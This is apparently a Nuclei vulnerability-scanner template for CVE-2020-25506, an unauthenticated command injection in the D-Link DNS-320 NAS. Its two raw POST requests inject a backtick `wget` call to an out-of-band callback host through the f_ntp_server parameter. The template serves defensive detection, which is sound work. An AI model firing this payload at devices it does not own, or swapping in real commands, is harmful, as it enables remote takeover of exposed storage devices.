id: CVE-2020-25506 info: name: D-Link DNS-320 Unauthenticated Remote Code Execution author: gy741 severity: critical description: D-Link DNS-320 FW v2.06B01 Revision Ax is susceptible to a command injection vulnerability in a system_mgr.cgi component. The component does not successfully sanitize the value of the HTTP parameters f_ntp_server, which in turn leads to arbitrary command execution. reference: - https://gist.github.com/WinMin/6f63fd1ae95977e0e2d49bd4b5f00675 - https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/ - https://nvd.nist.gov/vuln/detail/CVE-2020-25506 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-25506 cwe-id: CWE-78 tags: cve,cve2020,dlink,rce,oast,mirai,unauth,router,cisa requests: - raw: - | POST /cgi-bin/system_mgr.cgi? HTTP/1.1 Host: {{Hostname}} Accept: */* C1=ON&cmd=cgi_ntp_time&f_ntp_server=`wget http://{{interactsh-url}}` - | POST /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`wget http://{{interactsh-url}}` HTTP/1.1 Host: {{Hostname}} Accept: */* matchers: - type: word part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" # Enhanced by mp on 2022/03/27